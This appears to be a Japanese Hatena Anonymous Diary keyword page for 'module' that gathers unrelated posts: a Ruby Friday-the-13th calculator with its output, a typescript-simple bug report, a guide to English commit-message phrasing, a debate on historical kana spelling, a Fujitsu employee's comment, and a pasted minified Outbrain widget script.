「module」を含む日記 RSS

はてなキーワード: moduleとは

2017-10-13

anond:20171013044943

ruby

# 曜日定数定義
module YOUBI
    Sun = 0, Mon = 1, Tue = 2, Wed = 3, Thu = 4, Fri = 5, Sat = 6
end

# 指定年月日の曜日取得
# https://en.wikipedia.org/wiki/Determination_of_the_day_of_the_week#Implementation-dependent_methods
def get_youbi(year, month, day)
    day += if month < 3 then year-=1;year+1 else year-2 end # <
    (23 * month / 9 + day + 4 + year / 4 - year / 100 + year / 400) % 7
end

# 13日の金曜日判定
def super_friday(year, month)
    get_youbi(year, month, 13) == YOUBI::Fri
end

# メイン関数
def main
    for year in 2000..2100
        msg = "#{year}年:"
        for month in 1..12
            if super_friday(year, month)
                msg += "#{month}月13日 "
            end
        end

        #print msg + "\n" # back-slash
        puts msg
    end
end

# 実行
main

出力

2000年10月13日 
2001年4月13日 7月13日 
2002年9月13日 12月13日 
2003年6月13日 
2004年2月13日 8月13日 
2005年5月13日 
2006年1月13日 10月13日 
2007年4月13日 7月13日 
2008年6月13日 
2009年2月13日 3月13日 11月13日 
2010年8月13日 
2011年5月13日 
2012年1月13日 4月13日 7月13日 
2013年9月13日 12月13日 
2014年6月13日 
2015年2月13日 3月13日 11月13日 
2016年5月13日 
2017年1月13日 10月13日 
2018年4月13日 7月13日 
2019年9月13日 12月13日 
2020年3月13日 11月13日 
2021年8月13日 
2022年5月13日 
2023年1月13日 10月13日 
2024年9月13日 12月13日 
2025年6月13日 
2026年2月13日 3月13日 11月13日 
2027年8月13日 
2028年10月13日 
2029年4月13日 7月13日 
2030年9月13日 12月13日 
2031年6月13日 
2032年2月13日 8月13日 
2033年5月13日 
2034年1月13日 10月13日 
2035年4月13日 7月13日 
2036年6月13日 
2037年2月13日 3月13日 11月13日 
2038年8月13日 
2039年5月13日 
2040年1月13日 4月13日 7月13日 
2041年9月13日 12月13日 
2042年6月13日 
2043年2月13日 3月13日 11月13日 
2044年5月13日 
2045年1月13日 10月13日 
2046年4月13日 7月13日 
2047年9月13日 12月13日 
2048年3月13日 11月13日 
2049年8月13日 
2050年5月13日 
2051年:1月13日 10月13日 
2052年:9月13日 12月13日 
2053年:6月13日 
2054年:2月13日 3月13日 11月13日 
2055年:8月13日 
2056年:10月13日 
2057年:4月13日 7月13日 
2058年9月13日 12月13日 
2059年:6月13日 
2060年:2月13日 8月13日 
2061年:5月13日 
2062年:1月13日 10月13日 
2063年:4月13日 7月13日 
2064年:6月13日 
2065年:2月13日 3月13日 11月13日 
2066年:8月13日 
2067年:5月13日 
2068年:1月13日 4月13日 7月13日 
2069年:9月13日 12月13日 
2070年:6月13日 
2071年:2月13日 3月13日 11月13日 
2072年:5月13日 
2073年:1月13日 10月13日 
2074年:4月13日 7月13日 
2075年:9月13日 12月13日 
2076年:3月13日 11月13日 
2077年8月13日 
2078年:5月13日 
2079年:1月13日 10月13日 
2080年:9月13日 12月13日 
2081年:6月13日 
2082年:2月13日 3月13日 11月13日 
2083年:8月13日 
2084年:10月13日 
2085年:4月13日 7月13日 
2086年:9月13日 12月13日 
2087年:6月13日 
2088年:2月13日 8月13日 
2089年:5月13日 
2090年:1月13日 10月13日 
2091年:4月13日 7月13日 
2092年:6月13日 
2093年:2月13日 3月13日 11月13日 
2094年:8月13日 
2095年:5月13日 
2096年:1月13日 4月13日 7月13日 
2097年:9月13日 12月13日 
2098年:6月13日 
2099年:2月13日 3月13日 11月13日 
2100年:8月13日 

28年周期なの?

wikiのSakamotoメソッドソースwiki記法不具合じゃないの?

と思いましたが、、。

 ↓

https://groups.google.com/forum/#!msg/comp.lang.c/GPA5wwrVnVw/hi2wB0TXGkAJ

 ↓

"-bed=pen+mad."[m] 文字列の添字なんだな・・。

2017-06-23

typescript-simple動作が何か妙だ

調査

環境は以下の通り

$ sw_vers
ProductName:	Mac OS X
ProductVersion:	10.12.5
BuildVersion:	16F73

$ node --version
v8.1.2

$ npm --version
5.0.3

$ cat package.json
{
  "name": "strange-tss",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "@types/lodash": "^4.14.66",
    "typescript": "^2.3.4",
    "typescript-simple": "^8.0.1"
  }
}

以下をトランスパイルする

import * as _ from 'lodash'; console.log(_)`

まずはtsc

$ cat test.ts
import * as _ from 'lodash'; console.log(_)

$ ./node_modules/.bin/tsc test.ts

$ cat test.js
"use strict";
exports.__esModule = true;
var _ = require("lodash");
console.log(_);

OK

$ cat compile_by_tss.js
require('typescript-simple')("import * as _ from 'lodash'; console.log(_)")

$ node compile_by_tss.js
/Users/zzzzz/Documents/strange-tss/node_modules/typescript-simple/index.js:168
                throw new Error(this.formatDiagnostics(allDiagnostics));
                ^

Error: L0: File '/Users/zzzzz/Documents/strange-tss/lodash.ts' is not a module.
L0: Cannot use imports, exports, or module augmentations when '--module' is 'none'.
    at TypeScriptSimple.toJavaScript (/Users/zzzzz/Documents/strange-tss/node_modules/typescript-simple/index.js:168:23)
    at TypeScriptSimple.compile (/Users/zzzzz/Documents/strange-tss/node_modules/typescript-simple/index.js:69:25)
    at strange-tss (/Users/zzzzz/Documents/strange-tss/node_modules/typescript-simple/index.js:13:27)
    at Object.<anonymous> (/Users/zzzzz/Documents/strange-tss/compile_by_tss.js:1:91)
    at Module._compile (module.js:569:30)
    at Object.Module._extensions..js (module.js:580:10)
    at Module.load (module.js:503:32)
    at tryModuleLoad (module.js:466:12)
    at Function.Module._load (module.js:458:3)
    at Function.Module.runMain (module.js:605:10)

う〜ん

$ ./node_modules/.bin/tsc --help | grep module
 -m KIND, --module KIND Specify module code generation: 'commonjs', 'amd', 'system', 'umd' or 'es2015'.

2016-07-25

gitにおけるコミットログ/メッセージ例文集100

私はコミットログの書き方に悩む英語の苦手な人間である。実際、似たような人は世の中に結構いるようで、頻出単語を集計したりまとめたものは既にあって役に立つのだけれど、これらはあくま単語の話であり、具体的な文を構成する過程でやっぱり困る部分がかなりあった。

要するに、どういう時にどういう文が使われているのか、ということを示した例文集が欲しいのであるググると他にも「例文集があればいいのに」みたいな声はあるくせして、しかし誰も作ろうとしない。何なんだお前ら。それじゃ私が楽できないじゃないか

仕方なく自分でまとめたので、増田に垂れ流しておく。

はじめに

ここで挙げているコミットログは全て実際のコミットログから転載である。当然ながら各コミットログ著作権はそれぞれの書き手にある。いずれも各英文でググれば出てくるし、フェアユース範囲なら許してくれるだろうと考え名前プロジェクト名は割愛したが、ここにお詫びと感謝を述べておきたい。

抽出条件だが、参考にできそうなコミットログを多く含んでいそうなリポジトリGitHubSTARの多い方からざっと目で見て適当に選び、それぞれ最新コミットから5000件抽出した(あわせて前処理として、コミットログ冒頭のタグ情報は消去した)。

結果として対象としたリポジトリは以下の通り。

atomのみ5400件抽出していたため、計25400件のコミットログベースである。このうち、以下の条件に合致するものは参考例にすべきでないとして一律排除した。

こうして残った8540件を眺めながら、適当に切り出したのがこの用例集である個人的に「うーんこの」と思った表現も、散見される場合は載せた。

ということで、以下用例を羅列していく。

用例集

オプションフラグメニューを追加した
ファイルを追加した
メソッド機能を追加した
実装を別のものへ切り替えた
  • Use args.resourcePath instead of args.devResourcePath
  • Use arrays instead of while loops
  • Use auto instead of repeating explicit class names
  • Use weak pointer instead of manual bookkeeping
  • Change all uses of 'CInt' to 'Int32' in the SDK overlay
  • Change Integer#year to return a Fixnum instead of a Float to improve consistency
新しく何かに対応した/機能上の制約を取り払った
何かを使うようにした
より好ましい実装に改良した
何かを出来ない/しないようにした
  • Don't bail reading a metadata instance if swift_isaMask isn't available
  • Don't exit until the parent asks for an instance
  • Don't include Parent pointer in Nominal/BoundGeneric TypeRef uniquing
  • Don't use MatchesExtension for matching filters
  • Don't use ES6 class for AutoUpdater windows class
  • Don't use MatchesExtension for matching filters
  • Avoid `distinct` if a subquery has already materialized
  • Avoid infinite recursion when bad values are passed to tz aware fields
オブジェクトの内容や挙動確認やすくした
Assertを追加した
不要コードを除去した
コードを移動した
名前修正した
さなバグタイポ修正した, 警告を潰した
バグや好ましくない挙動修正した
テストコメントドキュメントを追加した
テストを削除した
テストコメント修正した
ドキュメント修正した

表現傾向とまとめ

以上の用例をふまえ、今回の参考ログ8540件から先頭の単語を出現回数で並べると次のようになった。

Add1149
Fix1014
Update584
Remove566
Use382
Don't260
Make228
Move178
Change103
Rename85
Improve76
Avoid68
Allow65
Implement60
Handle58

コミットログの基本形はもちろん動詞 + 名詞である名詞固有名詞複数形、不可算名詞が多いが、単数形場合冠詞は a が使われるか、あるいは省略される。the はまず使われない。

何かを追加した、という表現では非常に広く Add が使われる。メソッドからテストドキュメントに至るまで大概これでまかなえる。

一方、何かを修正した、という表現では広く Fix が使われる。「何か」は typocrash といった単語からメソッド名まで幅広い名詞を取るが、動名詞はあまり取らないのと、that節は取らないのでその点は注意が必要である

Fix は「何かが正しく動くようにした」ことを示し、正しい動作内容が何かを説明しない。そこで正しい動作内容に言及したい場合Make sure が使われる(こちらはthat節が取れる)。ただし Fix よりもニュアンス的に重い表現と思われ、Fix を使わず Make sure ばかり使うのはちょっとキモいのではないかと思う(Ensure はさらに重い表現っぽい)。

また、Fixtypo 以外でのドキュメント修正に対して使われることは稀である。対して Update はドキュメントコメントテストに使われ、本体コード修正に対しては使われない。本体コード修正にあわせてテスト更新したなら Update が使われる。ただ、テスト機構それ自体バグ修正したなら Fix である

無駄な何かを単純に除去したなら Remove を使う。これまでのもの(A)からのもの(B)に切り替えたのであれば Use B instead of A か Change A to B が使われる。新たに何かを利用するようにしたのであれば Use を、利用を取りやめた場合Don't use を使うことが多い。

何かをしないようにしたなら Don't を、内部実装効率化なら Make A + 比較級/形容詞Improve が使われる。

中身の変更を伴わない単なる名前の変更なら Rename A to B、コード機能論理上の場所を移動させたなら Move A to B である

この辺はリファクタリングと呼ばれる行為と思うが、Refactor というぼんやりした動詞はあまり使われず、このように変更内容の種類に応じて動詞が使い分けられている。

余談

コミットログにはWhyを書くべきだ、というのを何かで見かけたので because とか since を使ったログがどの程度あるかを調べたが、8540件のうち22件だった。基本的に短く、シンプルに、一目で意味が取れるログが好まれる傾向がある。例えば get rid of とか2件しか使われておらず、圧倒的に remove である

一方で、シンプル単語だけど開始単語としては使われないものもある。例えば次のような単語である。Expand(9)、Extend(8)、Print(5)、Optimize(5)、Publish(4)、Append(4)、Modify(3)、Manage(2)、Revise(2)、Dump(2)、Insert(2)、Migrate(2)、Enhance(1)、Edit(1) 。いずれもカッコ内は8540件に対する冒頭での登場回数である。結局、より一般的平易な単語で表せたり、Refactor同様に抽象度が高すぎると使われないのだろう。

おわりに

8000件もログを見たおかげで、迷いなくコミットメッセージが思いつくようになったのが個人的には今回書いてて最大の収穫だった。たぶんカンニングペーパーを作る行為それ自体効率のいい学習になるという話と同じだと思う。

このまとめも100以上用例を転載してあるので、それを読むだけでも多少は効果があるんじゃないかと思う。同じようにコミットログ書きたくねぇなぁ英語わっかんねぇなぁと思っている人にとって、何か役に立つところがあれば幸いである。

2016-06-16

歴史的仮名遣への熱い差別

http://b.hatena.ne.jp/entry/qiita.com/tadsan/items/fb496e450fc27c8c4494

歴史的仮名遣へのヘイトスピーチが人気コメントの2位・3位。これはひどい。そして悲しい。

多分、著者のtadsanは一々コメントを返したりしないので、この場で勝手ツッコミを入れてみる。

bottomzlife なぜ意味不明歴史的仮名遣いがまじってるんだ。気持ちいからやめてほしい。プログラマなら日本語コーディングガイドラインも守れ

「まじって」なんかない。全文が単なる歴史的仮名遣しかない。(これは逆に、「現代仮名遣い」との差が少ない証拠になってる)

あと「日本語コーディングガイドライン」が「現代仮名遣い」を指すなら、そのガイドラインの方が意味不明でクソ。まだ歴史的仮名遣の方が論理的で、プログラマ的にも腑に落ちる。その辺は http://web.archive.org/web/20020612101011/http://hb9.seikyou.ne.jp/home/kyuri/nihongo/kana-hikaku.html でも見れば、小学生でも解る。

megazalrock ネット歴史的仮名遣い風を使う人は無条件に信用しないことにしている。

歴史的仮名遣い風」ではなく、正真正銘の歴史的仮名遣。(字音仮名遣? 知らない子ですね…)

それでも信用しないのなら、個人の勝手だが、そんな差別をする奴は信用ならない。

snobbishinsomniac 「ヘッダ」「メソッド」ではなくて「ヘツダ」「メソツド」だろうし、「レガシー」「モジュール」じゃなくて「レガシイ」「モジユウル」ではないのかな。

外来語の長音記号とか大書き・小書きとかはどっちでもええんやで。

ちなみに「モジュール」は「module」でダ行だから「モヂュール」と書く人も居る。

ghostbass 現代口語と正仮名遣いの相性の悪さ。良い事書いているのに。

慣れの問題。いや本当に。

時間を掛けてまで歴史的仮名遣の読み書きを習得する価値は、個人的にはある。似た感覚としては、全然論理的でないHTML3.2を捨てて4.01とか5.0に移行するのと同じ程度に有用

2016-04-13

anond:20160413023627

富士通入社5年目の自分だが、ちょっと会社庇護をさせてほしい。彼の求める仕事会社存在しなかったわけではない。

弊社、ここ数年、OSS利活用に猛烈に注力している。有名どころではCloud Foundry参画の話http://www.publickey1.jp/blog/15/26_paas.htmlOpenStackへのコントビュートリンク先は作為的抽出なので注意)http://stackalytics.com/?release=all&metric=commits&module=api-site

彼の求める仕事はおそらくあったはずで、彼がその仕事をできなかったのは運(縁)がなかったという話で同情するし、彼の上司はクソだという点にも同意する。(彼の心象にも、富士通への風評的にも、それ以前に人としてよろしくない)

Excel某の話は自分経験があって、弊社開発の闇。1年目は彼と似たつらい思いもした。そういったことも全部自動化できればよいが、マンパワーで解決してしまいがち。ただ、2年目からは新製品の開発を含めガッツリ開発できたし、今はSI上流工程担当させてもらって(苦戦はしてるけど)充実してると感じる。

彼の境遇から辞めたことを批判できないが、面白い未来もあったかもしれないというお話

今後の彼に幸あらんことを。

# ところで弊社、2016年入社であれば絶賛研修中のはずだけど、2015年度以前入社?あるいはグループ会社

2016-03-04

window.OBR = window.OBR||{};(function(OBR){window.OB_releaseVer="01000501";window.OBR=window.OBR||{};OBR.k=OBR.k||;OBR.La=OBR.La||{};window.OBR$=function(d){return document.getElementById(d)};OBR.d=OBR.d||function(){var d={},a={v:function(){return d},h:function(a){d.X=a;d.cb=;d.startTime=(new Date).getTime()},startTime:function(){return d.startTime},log:function(a){var e=((new Date).getTime()-d.startTime)/1E3;1E3>d.cb.length&&d.cb.push(e+" >"+a)},printLog:function(){if(d.X.c.dj)window.console.log(d.cb.join("\n"));else{var a=d.X.b.Ia();a&&(a.innerHTML=d.cb.join("
"),a.style.display="block")}return d.cb.join("\n")}};a.h(OBR);return a}();OBR.printLog=OBR.d.printLog;OBR.H=function(){this.J=[]};OBR.H.prototype.add=function(d,a){var c;"string"===typeof d&amp;&amp;"function"===typeof a&amp;&amp;(c={},c.name=d,c.ai=a,this.J.push(c))};OBR.H.prototype.Qf=function(d){var a,c;OBR.d.log("remove event :"+d);a=0;for(c=this.J.length;a<c;a+=1)if(this.J[a]&amp;&amp;this.J[a].name&amp;&amp;this.J[a].name===d)try{this.J.splice(a,1)}catch(e){OBR.d.log("rm evnt err: "+e)}};</p&gt;

OBR.H.prototype.o=function(d,a,c){var e,b,f,g;a=a||[];c=!!c;OBR.d.log("event fire:"+d);e=0;for(b=this.J.length;e<b;e+=1)if(f=this.J&amp;&amp;this.J[e]?this.J[e].name:"",g=this.J&amp;&amp;this.J[e]?this.J[e].ai:null,f===d&amp;&g)try{g.apply(this,a)}catch(h){OBR.d.log("fire event *"+d+"* error: "+h)}!0===c&amp;&amp;this.Qf(d)};OBR.H.prototype.sa=function(){this.J=[]};OBR.b=OBR.b||function(){var d={},a={},c=document,e=OBR,b=null;a.v=function(){d.X=e;return d};a.h=function(a){e=a};a.Ba=function(){return function(){}};a.Gi=function(){var a=window.jQuery;return void 0!==a?!(/1\.(0|1|2|3|4)\.(0|1)/.test(a.fn.jquery)||/^1\.1/.test(a.fn.jquery)||/^1\.2/.test(a.fn.jquery)||/^1\.3/.test(a.fn.jquery)):!1};a.F=function(a){return null===a||isNaN(a)?null:e.n("outbrain_widget_"+a)};a.Ia=function(){return e.n("ob_holder")};a.ne=function(f){var g=a.Ia();null===g&amp;&amp;(g=e.b.createElement("div",</p&gt;

"ob_holder"),g.style.display="none",f?e.b.insertBefore(g,f):document.body.appendChild(g));return g};a.Vc=function(){if(!e.n(e.c.Pb)){var f=e.b.createElement("iframe",e.c.Pb),g=f.style;g.display="none";g.width="1px";g.height="1px";f.src="about:blank";(g=a.Ia())||(g=a.Va());e.b.Q(f,g)}};a.Va=function(){if(c.body)return c.body;var a;a=e.b.K("","","body",!0);return 0>=a.length?c.lastChild:a[0]};a.createElement=function(a,g,b,e){var d;a=c.createElement(a);"string"===typeof g&amp;&amp;a.setAttribute("id",g);"string"===

typeof b&amp;&amp;(a.style.cssText=b);for(d in e)e.hasOwnProperty(d)&amp;&amp;a.setAttribute(d,e[d]);return a};a.G=function(a){if(e.c.$d===e.c.Od)try{c.createStyleSheet().cssText=a}catch(g){OBR.d.log(g)}else{var b=c.createElement("style"),d=c.body?"string"===typeof c.body.style.WebkitAppearance:!1;b.type="text/css";c.getElementsByTagName("head")[0].appendChild(b);b[d?"innerText":"innerHTML"]=a}};a.N=function(a,g,b,d){var m=c.createElement("script");m.type=e.c.wj;m.src=a;m.charset="UTF-8";m.async=!!g;m.defer=!1;b&amp;&amp;

e.b.s(m,"load",function(a){var f=a.target;f&amp;&amp;setTimeout(function(){f.parentNode.removeChild(f)},3E3)});d&amp;&amp;e.b.s(m,"load",d);return m};a.Cl=function(a,g){var b=e.b.createElement("link",a);b.setAttribute("rel","stylesheet");b.setAttribute("type",e.c.Eh);g&amp;&amp;b.setAttribute("href",g);return b};a.ih=function(a){var g=e.n("ob_iframe");g&amp;&amp;(g.src=a)};a.Hf=function(){var a;a=isNaN(a)?1E5:a;return Math.floor(Math.random()*a)};a.nk=function(a,g,b){return a.replace(g,b)};a.Ll=function(){var f;if(f=OBR.n("objsonpp"))if(a.kj())a.Ka(f.parentNode)&amp;&amp;

f.parentNode.removeChild(f);else return OBR.n("objsonpp");f=c.createElement("iframe");f.id="objsonpp";f.tk&amp;&amp;(f.tk="seamless");(f.frameElement||f).style.cssText="width: 0; height: 0; border: 0";f.src="";c.body.appendChild(f);return f};a.R=function(a){var g,b;b=c.getElementsByTagName("head");try{b&amp;&amp;0<b.length?b[0].insertBefore(a,b[0].firstChild):(g=c.getElementsByTagName("script"),g[0].insertBefore(a,g[0].firstChild))}catch(d){e.d.log("Err insertToHead:"+d)}};a.Kl=function(a){a=a||OBR;return"function"!==</p&gt;

typeof a.H?(OBR.d.log("namespace.EventManager not function"),null):new a.H};a.O=function(a){return encodeURIComponent(a)};a.Ka=function(a){return null!==a};a.pj=function(f){var b,c=!1;if(a.Zc(f))return!1;b=f.Oe().recMode||"";f=f.Oe().dynamicWidgetLayout||"";b=e.c.rk[b]||"";"2"===b&amp;&amp;"1"===(e.c.sk[f]||"")&amp;&amp;(c=!0);c||"1"!==b&amp;&amp;"3"!==b||(c=!0);return c};a.Zc=function(a){return void 0===a||null===a};a.tj=function(b){return a.Zc(b)||""===b};a.getElementsByClassName=function(b,g){g||(g=document);return g.getElementsByClassName?

g.getElementsByClassName(b):a.K("class",b,"*",!0,!0,g)};a.K=function(b,g,e,d,m,l){var p,q,n;p=[];e=e||"*";d=!!d;m=!!a.tj(m);e=l?l.getElementsByTagName(e):c.getElementsByTagName(e);l=0;for(q=e.length;l<q;l+=1)n="class"===b?e[l].className:e[l].getAttribute(b),null!==n&amp;&amp;(!1===m&amp;&amp;(n=n.toLowerCase(),g=g.toLowerCase()),(n=""===b?!0:d?-1<n.indexOf(g):n===g)&amp;&amp;p.push(e[l]));return p};a.Wb=function(a,b,c){a.detachEvent?a.detachEvent("on"+b,c):a.removeEventListener&amp;&amp;a.removeEventListener(b,c,!1)};a.s=function(a,</p&gt;

b,c){a.attachEvent?a.attachEvent("on"+b,function(){c.call(a)}):a.addEventListener&amp;&amp;a.addEventListener(b,c,!1)};a.Q=function(a,b){try{b.appendChild(a)}catch(c){e.d.log("Fail insert into Dom:"+c)}};a.lb=function(b){b=e.n(b);!a.Zc(b)&amp;&amp;a.Ka(b.parentNode)&amp;&amp;b.parentNode.removeChild(b)};a.insertBefore=function(a,b){return b.parentNode.insertBefore(a,b)};a.isArray=function(a){return a instanceof Array?!0:"[object Array]"===Object.prototype.toString.call(a)};a.sb=function(a,b){var c=/htt(p|ps)?:\/\/127\.0\.0\.1(:\d\d\d\d)?/i;

return/^htt(p|ps)?:\/\/([\w\-]*|[\w\-]*\.[\w\-]*)\.outbrain\.com(:\d\d\d\d)?/i.test(a)||c.test(a)?a:b};a.al=function(a){a=a.replace(/^(\s*)/g,"");var b=c.createElement("div");b.innerHTML=a;return b.childNodes};a.Ua=function(a,b){return a?a.getAttribute(b):null};a.xa=function(a,b,c){a&amp;&amp;a.setAttribute(b,c)};a.I=function(a,b){var c=RegExp("[ '\"|]"+b+"[ '\"|]");a&amp;&amp;!c.test("|"+a.className+"|")&amp;&amp;(a.className+=" "+b)};a.ma=function(a,b){a&amp;&amp;typeof b===e.c.$k&amp;&amp;(a.classList?a.classList.remove(b):a.className=

a.className.replace(RegExp("(^|\\b)"+b+"(\\b|$)","gi")," "))};a.$=function(a,b){a=a.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");var c,e;try{return c=RegExp("[\\?&amp;]"+a+"=([^&amp;#]*)","i"),e=c.exec(decodeURIComponent(window.location.href.replace(/\+/g," "))),null===e?b:e[1]}catch(d){return b}};a.sh=function(a){"string"===typeof a&amp;&amp;0<a.indexOf("#")&amp;&amp;(a=a.substr(0,a.lastIndexOf("#")));return a};a.ie=function(a){var b=e.c.ga+"/strip_default.png";a.src!==b&amp;&amp;(a.alt="",a.title="",a.src=b)};a.Oh=function(){var a=</p&gt;

null,b,e,d=null;if("string"===typeof window.OB_MP_feed)a=window.OB_MP_feed;else if((b=c.getElementsByTagName("head"))&amp;&amp;0<b.length)for(e=b[0].getElementsByTagName("link"),b=0;b<e.length;b+=1)if(d=e[b],null!==d.type&amp;&amp;("application/rss+xml"===d.type||"application/atom+xml"===d.type)&amp;&amp;null!==d.href&amp;&amp;""!==d.href){a=d.href;break}return a};a.D=function(a,b){var c=null;a.currentStyle?c=a.currentStyle[b]:window.getComputedStyle&amp;&amp;(c=document.defaultView.getComputedStyle(a,null).getPropertyValue(b));return c};</p&gt;

a.xk=function(){var b=a.Ia(),g,c;a.Ka(b)&amp;&amp;(g=e.b.createElement("span","ob_a"),a.insertBefore(g,b),g.innerHTML=".",c=a.D(g,"color"),a.lb("ob_a"),g=e.b.createElement("a","ob_a"),g.setAttribute("href","void(0)"),g.innerHTML=".",a.insertBefore(g,b),b=a.D(g,"color"),a.lb("ob_a"),c="rgb(0, 0, 0)"===c||"#000000"===c?"#555":c,a.G(".ob-tcolor{color:"+c+"} .ob-lcolor{color:"+b+"} .ob-bgtcolor{background-color:"+c+"} .item-link-container:hover .ob-tcolor{border-color:"+c+"} "+(document.addEventListener?"":".odb_li:hover .ob-zapping-icon,.odb_div:hover .ob-zapping-icon,.item-container:hover .ob-zapping-icon,.ob-dynamic-rec-container:hover .ob-zapping-icon,.odb_li:hover .ob-textual-zapping-icon,.odb_div:hover .ob-textual-zapping-icon,.item-container:hover .ob-textual-zapping-icon,.ob-dynamic-rec-container:hover .ob-textual-zapping-icon{display:none !important;}")))};

a.Ke=function(b){var g=a.Ie("property","og:url","meta","content");null===g&amp;&amp;(g=a.Ie("rel","canonical","link","href"));null!==g||b||(g=window.location.href);null===g&amp;&amp;(g="");return g};a.Ie=function(b,g,c,e){var d=null;b=a.K(b,g,c,!1);null!==b&amp;&amp;0<b.length&amp;&amp;(d=b[0].getAttribute(e));return d};a.jh=function(b){var g,c,d;g=b.g("tracking",!1);c=b.g("comScoreEnabled",!0);d=e.c.je;!1===g&amp;&amp;(!0===c&amp;&amp;!1===d&amp;&amp;!b.Pe())&amp;&amp;(a.Vc(),g=b.q("pid",""),b=e.n(e.c.Pb))&amp;&amp;(b.src=e.c.ga+"/"+e.c.Ub+"3rd/comScore/comScore.htm#pid="+</p&gt;

g,e.c.je=!0)};a.Ei=function(){var b=a.Lb(8);"string"===typeof window.name&amp;&amp;(""===window.name||-1<window.name.indexOf("frame"))?(window.name=b,b=window.name):"string"===typeof window.name&amp;&amp;""!==window.name&amp;&amp;(b=window.name);return b=e.b.O(b.substring(0,9))};a.Lb=function(a){var b,c;b=[];a="number"===typeof a?a:8;for(c=0;c<a;c+=1)b.push("0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz".charAt(Math.floor(61*Math.random())));return b.join("")};a.me=function(a){for(var b="",c=0;c<a.length;c++)b=</p&gt;

b.concat(a[c]?"1":"0");return parseInt(b,2)};a.Xc=function(b){var g=b.getElementsByTagName("a")[0];if(null===b.offsetParent||0===b.offsetHeight||0===b.offsetWidth||0===b.clientHeight||0===b.clientWidth||"none"===a.D(b,"display")||"hidden"===a.D(b,"visibility"))return!1;var c=parseInt(a.D(b,"padding-top"),10)+parseInt(a.D(b,"padding-bottom"),10);return 0===b.clientHeight-c||g&amp;&amp;"none"===a.D(g,"display")?!1:!0};a.Oc=function(a){for(var b in e.La)if(e.La.hasOwnProperty(b)&amp;&amp;e.La[b].l===a)return e.La[b];

return null};a.Rl=function(a){for(var b in a)if(a.hasOwnProperty(b))return!1;return!0};a.Ga=function(a,b){return"function"!==typeof a?null:void 0===b?a():a(b)};a.kj=function(){return"Microsoft Internet Explorer"===navigator.appName};a.Fh=function(a,b){return a*b};a.Ge=function(a){if(!a||""===a)return[];a=a.replace("","").replace("http://","").replace("https://","").replace("www.","").replace("www2.","").split("/");a.pop();return 0<a.length?a:[]};a.ki=function(b,g){var c=a.Ge(b),e=[],d="";if(g>=c.length)d=

c.join(".");else{e[0]=c[0];for(d=1;d<=g;d+=1)e[d]=c[d];d=e.join(".")}return d};a.ti=function(){return"http"+("https:"===c.location.protocol?"s":"")};a.si=function(){var b,g;b=c.getElementById("widgetVersionSync");null===b&amp;&amp;(b=a.createElement("iframe","widgetVersionSync"),g=a.createElement("div",null,"display:none; height:0px; width:0px; border:none;"),g.appendChild(b),a.Va().appendChild(g));return b};a.ql=function(b){var g;g=window.OB_releaseVer;isNaN(g)||(isNaN(b)||g>=b)||(b=a.ti()+"://widgets.outbrain.com/external/sync/outbrainjs.html?needToBeVer="+

b.toString(),g=a.si(),g.src=b)};a.Sg=function(b){b=b.g("widgetVersionSync",0);isNaN(b)||""===b||(b=parseInt(b,10)||0,a.ql(b))};d.Rc=function(){if(b)return b;var a;try{var g=window.localStorage;g.setItem("OBtst","");g.removeItem("OBtst");a=g}catch(c){a={$b:{},setItem:function(a,b){this.$b[a]=b},removeItem:function(a){this.$b[a]=void 0},getItem:function(a){return"undefined"!==typeof this.$b[a]?this.$b[a]:null}}}return b=a};a.hg=function(a,b){d.Rc().setItem(a,b)};a.Qc=function(a){return(a=d.Rc().getItem(a))?

a:null};a.Gh=function(){d.Rc().removeItem("OB-USER-TOKEN")};a.h(OBR);return a}();OBR.ya=function(d,a,c,e,b,f,g,h,k){var m,l;m=this;l=0;k="function"===typeof k?k:OBR.b.Fh;m.start=function(){var p;l+=1;OBR.b.Ga(d,l)?OBR.b.Ga(a,l):(p=OBR.b.Ga(h,l))?OBR.b.Ga(e,l):(p=l===f&amp;&amp;1E3!==f)?OBR.b.Ga(e,l):(OBR.b.Ga(c,l),p=g?k(l,b):b,setTimeout(function(){m.start()},p))};m.start()};OBR.re=OBR.re||{fj:function(){return"complete"===document.readyState}};

OBR.Hc=function(){var d={},a=[];d.add=function(c){a.push(c)};d.remove=function(c){a.splice(c,1)};d.top=function(){return 0<a.length?a.shift():null};d.jj=function(){return 0>=a.length};d.Jl=function(){return a};d.qh=function(){a=[]};return d};

OBR.Ra=function(){function d(e,b){a.pb="resolve"===e?function(a){a&amp;&amp;a(b)}:function(a,g){g&amp;&g(b)};a.Pa=a.kk=function(){throw Error("Promise already completed.");};for(var f,g=0;f=c[g++];)f[e]&amp;&amp;f[e](b);delete c}var a={},c=[];a.pb=function(a,b){c.push({resolve:a,reject:b})};a.Pa=function(a){d("resolve",a)};a.kk=function(a){d("reject",a)};return a};

OBR.Ag=function(d){var a={},c=null,e,b;a.onClickOrAutoplay=void 0;a.onDisplayReady=void 0;a.onError=void 0;a.fetch=function(a){null===c?(c=a,b&amp;&amp;b(c,this),b=null):(c=a,OBR.Ja.of([this]))};a.shown=function(a){e=a;OBR.Ja&amp;&amp;OBR.Ja.pl(d.widgetId,d.playerId,e)};a.stopTimer=function(){if(this.tg){window.clearInterval(this.tg);var a=document.querySelector('[data-ob-player-id="'+d.playerId+'"] .timerNumber');a&amp;&amp;(a.textContent=a.parentElement.getAttribute("data-time"))}};a.placed=function(){OBR.Ja.ol(d.playerId)};

a.uj=function(a){b=a;c&amp;&amp;b(c,this)};a.Ue=function(){return d};a.Hl=function(){return e};a.Nl=function(){return d.when};return a};OBR.Fg=function(){var d={},a="00.000",c=null,e=null,b=0;d.start=function(){null===c&amp;&amp;(c=new Date);null!==e&amp;&amp;(b+=new Date-e)};d.stop=function(){var f=new Date(new Date-c-b),g=f.getUTCSeconds(),f=f.getUTCMilliseconds();e=new Date;return a=(9<g?g:"0"+g)+"."+(99<f?f:9<f?"0"+f:"00"+f)};return d};</p&gt;

